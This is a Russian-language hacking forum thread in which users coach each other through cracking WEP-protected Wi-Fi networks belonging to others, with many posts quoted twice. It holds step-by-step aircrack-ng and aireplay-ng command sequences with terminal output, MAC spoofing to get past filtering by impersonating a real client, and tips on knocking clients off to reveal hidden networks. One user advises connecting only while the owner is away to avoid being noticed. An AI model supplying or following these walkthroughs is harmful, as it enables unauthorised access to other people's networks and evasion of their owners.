ALEX 87
у меня такая же фигня была не мог подключится к точке потому что скрытая и без шифрования, и рядом неодного клиента,но используя CommView собрал Beacon пакетов гдето 40000 и имя сети само появилось! а подключаюсь с помощью проги WiFi Hopper очень удобная ,попробуй мож получится!

Semby68
Добрый день.Попробовал последним способом,тем что ты ссылку дал с видео,неполучается!Ничего не могу понять,собираю пакеты причём разными способами aircrack после подбора мне выдаёт Failed.Next try with 10000 IVs. и чем больше тем больше он мне пишет IVs.Вчера собрал 5000000 дата пакетов,и нечего не получилось!Может что не так делаю?Хотя всё делаю как в описаниях по подбору!Может,просто нельзя подобрать ключ к точке,так пробовал не только с одной и ничего! И ещё вопросик,как можно поменять свой мак адрес и где это делается?

Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?

boykent, а ты точно WEP ломаешь? Если там WPA/WPA2, то атака только по словарю

Здравствуйте!
Я владелец лэптопа Acer Extensa 5220 с wifi модулём Broadcom 4312 и WinXP SP3.
Как мне перевести wifi модуль в т.н. "monitor mode" и какой программой ловить пакеты, проходящие через сеть, к которой я подключен?

Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.

Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так;
BSSID 00:40:96:55:D8:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.

Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так;
BSSID 00:40:96:55:D8:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста.

Попробуй знаешь что, когда пускаешь aircrack-ng опцию -n поставь 64 бита (или 128, если ставишь 64). У мя такой косяк был ;)
Вообще говоря, даже если ты пользуешся не BackTrck'ом вся проблема в длине взамываемого ключа - у тебя выбрана неверно.

Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?
Да всё верно: -100 это п..дец как далеко
-0, 01 это п..дец как близко :)

Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.

Чавойто Broadcom для мониторинга не пригоден-то, ась? Очень даже: airmon-ng start wlan0 и фперёд))

seteboz
А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше?

seteboz
А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше?

Во-первихъ, aircrack-ng --help. А вообще нет, не автоматом, есть ключ команды aircrack-ng "-n 64" (для ключа 64 бит). Вот пример:
aircrack-ng -n 64 -b [bssid-сети вайфай] [filename- файл с перехваченными пакетами]-01.cap

http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
По этой ссылке подробная инструкция по взлому WEP в BackTrack 3.
Всё проверено всё работает. Возникнут вопросы пиши

Уважаемый seteboz!
Попробовал я её сломать с помощью вашей подсказки и по ссылке смотрел,и так и так пробовал,ничего не получилось!Дело в том,что эта точка она скрытая и когда я ловлю с неё пакеты сначало узнаю название её потом как не странно она с WEP WEP переименовывается в WPA WEP шифрование!Рядом есть ещё точки у них шифрование такое WPA2 TKIP ну или чтото в этом роде!Может быть что та точка которую я хочу поломать скрывает не только своё имя но и шифрование с wep превращается в wpa!Какие есть мысли? А где можно хороших словарей скачать,а то меня уже стали окружать одни только WPA?И вообще,есть кто на этом форуме,кто смог изьять ключик на WPA? или ещё мало кто смог преодалеть такую защиту?

Semby68
Добрый день.Попробовал последним способом,тем что ты ссылку дал с видео,неполучается!Ничего не могу понять,собираю пакеты причём разными способами aircrack после подбора мне выдаёт Failed.Next try with 10000 IVs. и чем больше тем больше он мне пишет IVs.Вчера собрал 5000000 дата пакетов,и нечего не получилось!Может что не так делаю?Хотя всё делаю как в описаниях по подбору!Может,просто нельзя подобрать ключ к точке,так пробовал не только с одной и ничего! И ещё вопросик,как можно поменять свой мак адрес и где это делается?
я ломаю WEP простым способом !

BT-3

1. #airmon-ng

2. #airmon-ng stop rausb0

{ rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon }

останавливаю Wi-fi карту для смены мак адреса .

3. # ifconfig rausb0 down

я пишу этот { 00:55:67:89:55:22 }

4. # macchanger --mac 00:55:67:89:55:22 rausb0

запускаем

5. # airmon-ng start rausb0

видим (monitor mode enabled on rausb0 )

Теперь сканим доступные беспроводные сети, использующие шфрование WEP


6 .# airodump-ng rausb0
остановить airodump клавишами Ctrl + С

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0

атакуем точку и комп

8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

запускаем дишифратор

9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

посе сбора 20 пакетов DATA запускаем aircrack

10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap

и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай !

удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS #

И ещо , купил адаптор USB WI-FI мощный , вот ссылка

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>

>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0

Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>


я так понял { iwconfig rausb0 channel <n> } это настройка скорости между точкой и моей картой .

а атаку , p0841 , попробую ,
благодарю !# Semby68 #

Semby68
x-demon
ОГРОМНОЕ СПАСИБО!!!!!! наконец получилось! я вместо своего мак адреса подставил мак клиента и пакеты посыпались горой в 100 раз быстрее!Удачи вам и процветанию этому сайту!
НО ТЕПЕРЬ ВОЗНИКЛА ДРУГАЯ ПРОБЛЕМА!Как подключится к этой точке она же скрытая! использую WIFI Hopper!или есть др.софт для подключения к скрытым точкам?

Скрытую точку обнаружить просто. Надо запустить airodump-ng на канале, на котором висит точка, и ждать пока кто то подключится. Либо вышибить уже подключенного клиента. Как только он подключится - имя точки будет вскрыто.

Уважаемый x-demon
Вообщем получилось прописать имя и ключ ,но всё равно не могу подключится видимо там на точке стоит MAC или Ip фильтрация адресов!Может такое быть и как от этого исбавится,как мне изменить MAC и IP адрес чтоб подключится? А как можно узнать ip адрес точки доступа к которой я хочу подключится? и надо же ip знать?

macchanger --mac 11:22:33:44:55:66 wlan0 - значения подставить свои. Нет, если на точке включен DHCP. Если не включен... можно попробовать узнать пул IP адресов с помощью kismet

Можно и средствами ifconfig'a
ifconfig <iface_name> hw ether XX:XX:XX:XX:XX:XX

я так и не понял как MAC менять. Вот что я делаю:
# airmon-ng
Допустип выдает ath0. Далее останавливаю:
# airmon-ng stop ath0
И пытаюсь сменить MAC:
# macchanger --mac 00:11:22:33:44:55 ath0
А оно мне типа нет такого устройства. Что я делаю не так?

Блин что там сложного?

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:555
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0

При работе с BT3 или BT4 не происходит сбор #data пакетов, в чём может быть причина? beacon и pockets только собираются.


edimax ew-7318USg

Всем привет возникла небольшая проблемка по подключению к сети сеть сама по себе открытая но стоит фильтрация по macу и вроде бы все легко (заменить свой адресс на другой зареганный в сети) но при замене к точке хрен подключишься она меня просто игнорит адаптер edimax 7128g (чип rt2501)

Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто?

igor29
Попробуй IP адрес у себя прописать,у меня была такая проблема!сначала ключик добыл с помощю ВТ3,а потом прописал мак его клиента, не мог подключится!а потом думаю дай я с ip адресами побалуюсь,прописал в насторойках wifi карты 192.168.1.2,и всё стало мне счастье!сейчас сижу на точке,правда пока клиент в сети я не могу подключится,но он редко бывает!Так что удачи!

[QUOTE=boykent]Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто?

Точно, протестировал на своей сети, поддключил ноутбук и дата покеты пошли. А как быть с чужими сетями которые молчат? как понимаю их надо как-то разговорить, если не ошибаюсь, этим занимается aireplay-ng ?при помощи инъекций

Добрый день! Уважаемые колдуны, вопросов много, начну с главного (ибо сегодня нужно определится) Вобщем купил точку доступа Planet WAP-4036, но нудобно без хаба, хочу сделать чтоб инет раздавало без взаимодействия компа (сервака)... Вот думаю сменить на Planet WAP-4035 со строеным хабом! Вопрос такой: какую точку лучше взять, интересует дальность радиуса действия и стабильность работы! Или порекомендуйте других производителей: только D-link, TP-link или из Planet что то иное! Другие фирмы не предлагать, ибо у нас их почти нет и цена кусючая! Заранее спс

boykent
спасибо за совет сменил mac и ip но ниче не изменилось

igor29
а ты не пробовал баловаться последними цифрами ip адреса? Пример:
192.168._._ , менять последнии цифры!У меня сначало тоже ничего не шло но потом попал,и не получалось подключится когда клиент,хозяин этого мак адреса был подключён!может в этом причина?!

Kortez
Чуть выше описовал взлом Semby68,за что ему спасибо!Попробуй этим способом,там можно заставить точку с помощью aireplay-ng отдавать пакеты твоему мак адресу!
Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) Короче, вот ссылка там всё увидешь: http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
А ещё, что я делал чтоб пакеты быстрей собирались но это если есть хотябы один клиент возле точки прописывал вместо своего МАК адреса мак адрес клиента!И скорость сбора увеличивалась раза в два, в три!!!

boykent
Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool:

boykent
Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool:

Предупрежу тебя!Незлоупотребляй подключением или иначе тебя заблочат т.е., клиент которого ты используешь мак адрес в то время пока ты подключён не сможет подключится и тогда поменяет мак адре или того хуже зашифруют сетку!Используй подключение тогда когда клиент отсутствует, а лучше запомни время когда тебе можно подключится!Удачи и всех благ!

boykent
спасиб за предупреждение уж за этим прослежу :)

Kortez
Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) !

После того, как я прописываю эту команду, выдёт мол процесс unsuccesful.

Поделитесь возможным успешным опытом установки и запуска Kismet-2009-06-R1 (берется с сайта http://www.kismetwireless.net/download.shtml) в Ubuntu 9.04
Я запаривался настраивать процессы kismet_server и kismet_client :-(

После того, как я прописываю эту команду, выдёт мол процесс unsuccesful.

попробуй без ( -е ESSID точки ). Дело в том что я пробовал сначало без него и ничего,а потом прописал ESSID и всё заработало! Ты ж делаешь всё по инструкции?Как описано здесь http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 ?

попробуй без ( -е ESSID точки ). Дело в том что я пробовал сначало без него и ничего,а потом прописал ESSID и всё заработало! Ты ж делаешь всё по инструкции?Как описано здесь http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 ?

Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0
06:49:59 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11

06:49:59 Sending Authentication Request (Open System) [ACK]
06:49:59 Authentication successful
06:49:59 Sending Association Request [ACK]
06:49:59 Association successful :-) (AID: 1)
root@bt:~# aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
06:51:23 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11
Saving ARP requests in replay_arp-0625-065123.cap
You should also start airodump-ng to capture replies.
^Cad 4153 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)


Но data покеты всё равно не собираются...хмм

Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0


Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло!

Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0


Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло!

А как определить, есть ли рядом с ним клиент?и как узнать bssid клиента?

А как определить, есть ли рядом с ним клиент?и как узнать bssid клиента?

опредилить можно только визуально!Когда ты прописываешь команду: airodump-ng -c (channel) -w pacets -bssid (мак адрес точки) (твой девайс), запускается airodump-ng именно для этой точки!То ниже если есть клиент(точнее пользователь зтой точки) ты увидешь типа того:

FF:FF:FF:FF:FF:FF XX:XX:XX:XX:XX:XX 0 0 0 0

FF:FF:FF:FF:FF:FF - Это мак адрес точки которую ты хочешь взломать!

XX:XX:XX:XX:XX:XX - это мак адрес клиента!!!Но это если он есть!

опредилить можно только визуально!Когда ты прописываешь команду: airodump-ng -c (channel) -w pacets -bssid (мак адрес точки) (твой девайс), запускается airodump-ng именно для этой точки!То ниже если есть клиент(точнее пользователь зтой точки) ты увидешь типа того:

FF:FF:FF:FF:FF:FF XX:XX:XX:XX:XX:XX 0 0 0 0

FF:FF:FF:FF:FF:FF - Это мак адрес точки которую ты хочешь взломать!

XX:XX:XX:XX:XX:XX - это мак адрес клиента!!!Но это если он есть!

Вот проблема в том, что клиентов нету, молчит по полной. Отсюда и отсутствие дата пакетов, что делать я прям хз... :(

Вот проблема в том, что клиентов нету, молчит по полной. Отсюда и отсутствие дата пакетов, что делать я прям хз... :(

Попробуй вот эту атаку aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>, правда я ещё сам не пробовал, сегодня попробую и отпишусь! И ты напиши как получилось!

Попробуй вот эту атаку aireplay-ng -2 -p 0841 -e <имя_точки>
Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>, правда я ещё сам не пробовал, сегодня попробую и отпишусь! И ты напиши как получилось!

Вот что выдаёт :

root@bt:~# iwconfig wlan0 channel 11
root@bt:~# aireplay-ng -2 -p 0841 -e JAZZTEL_1D
No replay interface specified.
"aireplay-ng --help" for help.


Далее присмотрелся в:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1A:2B:2B:6E:20 -77 100 11726 104537 0 11 54 WEP WEP OPN JAZZTEL_1D

BSSID STATION PWR Rate Lost Packets Probe

00:1A:2B:2B:6E:20 00:08:A1:81:10:6F 0 18- 0 0 282235

Увидел STATION и как я понял, это и есть клиент. Далее прописал его в :
aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:08:A1:81:10:6F -e JAZZTEL_1D wlan0
и aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:23:54:5F:66:0F wlan0

И сработало, собрал 100к пакетов за пару минут.

Хотелось бы ещё разобраться с атакой aireplay-ng -2 -p 0841 -e

Вот что выдаёт :

root@bt:~# iwconfig wlan0 channel 11
root@bt:~# aireplay-ng -2 -p 0841 -e JAZZTEL_1D
No replay interface specified.
"aireplay-ng --help" for help.


Далее присмотрелся в:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1A:2B:2B:6E:20 -77 100 11726 104537 0 11 54 WEP WEP OPN JAZZTEL_1D

BSSID STATION PWR Rate Lost Packets Probe

00:1A:2B:2B:6E:20 00:08:A1:81:10:6F 0 18- 0 0 282235

Увидел STATION и как я понял, это и есть клиент. Далее прописал его в :
aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:08:A1:81:10:6F -e JAZZTEL_1D wlan0
и aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:23:54:5F:66:0F wlan0

И сработало, собрал 100к пакетов за пару минут.

Хотелось бы ещё разобраться с атакой aireplay-ng -2 -p 0841 -e

Я так думаю нужно прописать было так: aireplay-ng -2 -p 0841 -e (ESSID точки) (твой девайс) !
Попробовал у себя если честно чёт ничего не понял, буду разбиратся дальше! Вот тут видео по этой атаке: http://www.casttv.com/video/ymwdo71/avhackers-cracking-wep-with-aireplay-ng-0841-method-video , и тут http://www.genwi.com/play/1759426

Я так думаю нужно прописать было так: aireplay-ng -2 -p 0841 -e (ESSID точки) (твой девайс) !
Попробовал у себя если честно чёт ничего не понял, буду разбиратся дальше! Вот тут видео по этой атаке: http://www.casttv.com/video/ymwdo71/avhackers-cracking-wep-with-aireplay-ng-0841-method-video , и тут http://www.genwi.com/play/1759426

Не получается у меня разобраться с этой атакой...как у тебя успехи?

Не получается у меня разобраться с этой атакой...как у тебя успехи?
Разобрался, пишем значит так:
Собираем пакеты в файл;
airodump-ng -w packets -c 11 --bssid (bssid точки) (твой девайс)

Открываем новую консоль и пишем:
aireplay-ng -1 0 -a bssid -h (bssid клиента или можешь подставить свой если не будет клиента) -e (essid) (твой девайс)

Далее пишем:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h (bssid клиента или можешь подставить свой если не будет клиента) (твой девайс) далее на вопрос Use this packet ? отвечаем ( Y ) жмём enter, пакеты должны пойти!
Далее подбираем ключ aircrack-ng -p 1 packets.cap
Всё подбор пошол! Пробуй, я смог собрать дата пакеты с точки у которой нет рядом клиента! Удачи!

Вопрос Специалистам
У меня XP карточка D-Link AirPlus Xtreme DWL-G650
Специально искал чтоб изучить взлом сетей
И так понравилась прога Aircrack for Windows
https://forum.antichat.net/thread33882-aircrack.html
Все сделал как там говарилось даже карточка там как у меня использовалось
нажимаю на airodump.exe прохожу все последним Only write WEP Ivs y/n ставлю "y"

А ПОТОМ ВЫХОДИТ ЭТИ ПРЕДЛОЖЕНИЕ И КИДАЕТ НА САЙТ ЧТОБ ОБНОВИТЬ ДРАЙВЕР

"The selected Adatper's driver is not compatible with the PEEK Protocol. See the Aircrack documentation for more information on how to install a compatible driver.

Only Ahteros, Aironet, Realtek, and Hermes1 chipsets have a Peek driver. There is NO peek drvier AT ALL for Prism, Ralink, Marvel, TI, or Centrino chipsets.

ЧТО МНЕ ДЕЛАТЬ ???

Далее пишем:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h (bssid клиента или можешь подставить свой если не будет клиента) (твой девайс) далее на вопрос Use this packet ? отвечаем ( Y ) жмём enter, пакеты должны пойти!
Далее подбираем ключ aircrack-ng -p 1 packets.cap
Всё подбор пошол! Пробуй, я смог собрать дата пакеты с точки у которой нет рядом клиента! Удачи!

После этой команды, у меня ничего не спрашивает, начинается следующее и без конца:
root@bt:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 9193 packets...

После этой команды, у меня ничего не спрашивает, начинается следующее и без конца:
root@bt:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 9193 packets...

А ты не пробовал команду что раньше прописать aireplay-ng -2 -p 0841 -e (ESSID точки) (твой девайс)
заместо этой aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0, или не писать -c FF:FF:FF:FF:FF:FF! Нужно пробовать всё!

Вопрос Специалистам
У меня XP карточка D-Link AirPlus Xtreme DWL-G650
Специально искал чтоб изучить взлом сетей
И так понравилась прога Aircrack for Windows
https://forum.antichat.net/thread33882-aircrack.html
Все сделал как там говарилось даже карточка там как у меня использовалось
нажимаю на airodump.exe прохожу все последним Only write WEP Ivs y/n ставлю "y"

А ПОТОМ ВЫХОДИТ ЭТИ ПРЕДЛОЖЕНИЕ И КИДАЕТ НА САЙТ ЧТОБ ОБНОВИТЬ ДРАЙВЕР

"The selected Adatper's driver is not compatible with the PEEK Protocol. See the Aircrack documentation for more information on how to install a compatible driver.

Only Ahteros, Aironet, Realtek, and Hermes1 chipsets have a Peek driver. There is NO peek drvier AT ALL for Prism, Ralink, Marvel, TI, or Centrino chipsets.

ЧТО МНЕ ДЕЛАТЬ ???
Ну , и как, не пробовал обновить драйвера? Просто тебе нужно найти драйвера совместимые с твоей системой! На той странице написано:
Скачать Aircrack для Windows можно по этой ссылке , но не спешите сразу запускать его, так как у некоторых пользователей могут возникнуть некоторые проблемы связанные с программой, для запуска и правильной работы понадобится еще несколько важных файлов, которые разработчики почему-то не вложили в основной архив с программой, по крайней мере сколько версий Aircrack’а я не скачивал, во всех не было некоторых системных файлов и кое-каких библиотек, которые нужны для корректной работы программы, но где их скачать, и для чего они нужны я расскажу далее в статье. Может быть такое, что эти дравера которые ты ставишь просто не подходят!Нужно поискать другие, попытаюсь поискать инфу для тебя,позже отпишусь!

А ты не пробовал команду что раньше прописать aireplay-ng -2 -p 0841 -e (ESSID точки) (твой девайс)
заместо этой aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0, или не писать -c FF:FF:FF:FF:FF:FF! Нужно пробовать всё!

Всё выше перечисленное работает, в том плане что появляется этот вопрос и т.д, летят от меня пакеты, НО дата пакеты молчат.
Попробовал удалить -c FF:FF:FF:FF:FF:FF ноль эмоций, вопрос не появляется.

Пока получается взламывать сети только с bssidom кдиентов. Как быть с точками без клиентов, ума не приложу..

Как быть с точками без клиентов, ума не приложу..
aireplay-ng -1 тебе поможет..но не со всеми AP
а вообще - wesside-ng =\

aireplay-ng -1 тебе поможет..но не со всеми AP
а вообще - wesside-ng =\
А можно поподробнее про эту атаку?

А можно поподробнее про эту атаку?
Про какую?
Про первую здесь (http://www.aircrack-ng.org/doku.php?id=fake_authentication).
Пример: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Про вторую здесь (http://www.aircrack-ng.org/doku.php?id=wesside-ng).
Пример: wesside-ng -i wlan0

Форум очень хороший. После прочтения возникли вопросы какие пакеты нужно собирать в Commenview для WPA. Для WEP собирал только data и игнорировл Beacon. Теже самые настройки для WPA пройдут? И еще в Commenview указываю (инструменты-> генератор пакетов -> показать шаблоны ) указываю arp шаблон к примеру но пакетов даты нет назад. Может я что-то указываю нетак? подскажите как в Commenview заставить точку слать пакеты дата (а то приходиться долго ждать пока достаточное кол-во набереться).

Форум очень хороший. После прочтения возникли вопросы какие пакеты нужно собирать в Commenview для WPA. Для WEP собирал только data и игнорировл Beacon. Теже самые настройки для WPA пройдут? И еще в Commenview указываю (инструменты-> генератор пакетов -> показать шаблоны ) указываю arp шаблон к примеру но пакетов даты нет назад. Может я что-то указываю нетак? подскажите как в Commenview заставить точку слать пакеты дата (а то приходиться долго ждать пока достаточное кол-во набереться).
Я с помощью AiroWizard пакеты для инъекции ловил и импортировал в CommView.

Форум очень хороший. После прочтения возникли вопросы какие пакеты нужно собирать в Commenview для WPA. Для WEP собирал только data и игнорировл Beacon. Теже самые настройки для WPA пройдут? И еще в Commenview указываю (инструменты-> генератор пакетов -> показать шаблоны ) указываю arp шаблон к примеру но пакетов даты нет назад. Может я что-то указываю нетак? подскажите как в Commenview заставить точку слать пакеты дата (а то приходиться долго ждать пока достаточное кол-во набереться).

Во-первых CV кал, меня лично, он не устроил.
Во-вторых, ты уверен, что твоя карта поддерживает функцию инъекций?
П.С. лучше осваивай backtrack.

добрый день Господа. недавно познакомился с замечательной ОС бяктрек. хотелось бы ее освоить. бяктрековцев, как я понял считанные единицы...... конечно, ведь это не в контрастрайк поиграть...... я знаю что все форумчане занятые люди и не хочу просить вас тратить на меня время, но желание изучить бяктрек слишком сильное :)

буду очень благодарен всем вам.......проведите меня по прериям бяктрека. инструкция вся на инглиш. :( блин......... например для начала хотел бы научиться ломать вайфай. ребята..... поможете брату с взломом? плииииз :)

Во-первых CV кал, меня лично, он не устроил.
Во-вторых, ты уверен, что твоя карта поддерживает функцию инъекций?
П.С. лучше осваивай backtrack.

может ты и прав...но с wep справился на раз. Карта netgear wgt311.

back track уже стоит на очереди...))

добрый день Господа. недавно познакомился с замечательной ОС бяктрек. хотелось бы ее освоить. бяктрековцев, как я понял считанные единицы...... конечно, ведь это не в контрастрайк поиграть...... я знаю что все форумчане занятые люди и не хочу просить вас тратить на меня время, но желание изучить бяктрек слишком сильное :)

буду очень благодарен всем вам.......проведите меня по прериям бяктрека. инструкция вся на инглиш. :( блин......... например для начала хотел бы научиться ломать вайфай. ребята..... поможете брату с взломом? плииииз :)

Для начала, изучи базовые понятия и принципы работы. Начни читать этот топик, с самого начала, много чего полезного узнаешь.
Я сомневаюсь, что кто-то тут будет давать тебе курсы с нуля.

Увлекаться вардрайвингом и прочей подобной тематикой, без знания инглиша - не серьёзно.

добрый день Господа. недавно познакомился с замечательной ОС бяктрек. хотелось бы ее освоить. бяктрековцев, как я понял считанные единицы...... конечно, ведь это не в контрастрайк поиграть...... я знаю что все форумчане занятые люди и не хочу просить вас тратить на меня время, но желание изучить бяктрек слишком сильное :)

буду очень благодарен всем вам.......проведите меня по прериям бяктрека. инструкция вся на инглиш. :( блин......... например для начала хотел бы научиться ломать вайфай. ребята..... поможете брату с взломом? плииииз :)
Для начала посмотри сдесь http://forum.antichat.ru/thread80721.html , там много найдёшь полезного!

добрый день Господа. недавно познакомился с замечательной ОС бяктрек. хотелось бы ее освоить. бяктрековцев, как я понял считанные единицы...... конечно, ведь это не в контрастрайк поиграть...... я знаю что все форумчане занятые люди и не хочу просить вас тратить на меня время, но желание изучить бяктрек слишком сильное :)

буду очень благодарен всем вам.......проведите меня по прериям бяктрека. инструкция вся на инглиш. :( блин......... например для начала хотел бы научиться ломать вайфай. ребята..... поможете брату с взломом? плииииз :)

Вы из какого города?

Благодарю Господа за отзывы.

Это мой опыт жизненный. Если хочешь чему то научиться - советуйся с людьми которым это знакомо. Сохраняется много времени и дружба крепнет и ошибок мало сделаешь. Это так и никак по другому.

boykent -- спасибо...... то что надо

Kortez -- я не это имел ввиду..... я имел ввиду указать полезные ссылки :)

4ikotillo -- я везде и нигде :)

За отзывы благодарен всем! В свою очередь помогу чем могу.

Благодарю Господа за отзывы.

Это мой опыт жизненный. Если хочешь чему то научиться - советуйся с людьми которым это знакомо. Сохраняется много времени и дружба крепнет и ошибок мало сделаешь. Это так и никак по другому.

boykent -- спасибо...... то что надо

Kortez -- я не это имел ввиду..... я имел ввиду указать полезные ссылки :)

4ikotillo -- я везде и нигде :)

За отзывы благодарен всем! В свою очередь помогу чем могу.

Если интересен BT3 можешь зайти сюда http://backtrack.flybb.ru/

